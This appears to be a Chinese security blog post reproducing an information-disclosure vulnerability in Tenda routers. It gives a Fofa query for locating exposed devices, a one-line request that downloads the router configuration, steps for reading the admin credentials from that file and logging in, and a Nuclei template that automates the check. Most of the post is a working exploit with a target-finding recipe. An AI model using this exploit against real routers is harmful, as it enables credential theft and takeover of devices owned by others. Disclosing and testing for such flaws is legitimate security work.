漏洞复现-Tenda 路由器

漏洞描述

Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞，攻击者通过构造特殊 URL 地址，读取系统敏感信息网访问该系统。

漏洞复现

1、Fofa
title=”Tenda | LOGIN”

2、界面如下

3、POC
/cgi-bin/DownloadCfg.jpg
4、从配置中查找账户密码(直接打开JPG就行了)

5、成功登录如下

Nucle脚本

id: tenda-router-downloadcfg-infolink

info:
name: Tenda 路由器 DownloadCfg 信息泄露漏洞
author:
severity: high
description: Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞，攻击者通过构造特殊 URL 地址，读取系统敏感信息网访问该系统。
reference:
- https://
metadata:
fofa-query: title="Tenda | LOGIN"
verified: true
max-request: 1

http:
- raw:
- |
GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- 'status_code==200 && contains_all(body,"Please")'

免费领取安全学习资料包！